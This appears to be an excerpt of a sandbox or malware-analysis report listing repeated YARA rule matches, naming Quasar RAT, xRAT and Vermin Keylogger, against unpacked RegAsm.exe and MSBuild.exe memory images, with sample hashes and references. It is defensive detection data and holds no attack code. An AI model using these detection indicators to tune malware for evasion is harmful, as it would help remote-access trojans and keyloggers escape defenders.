Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
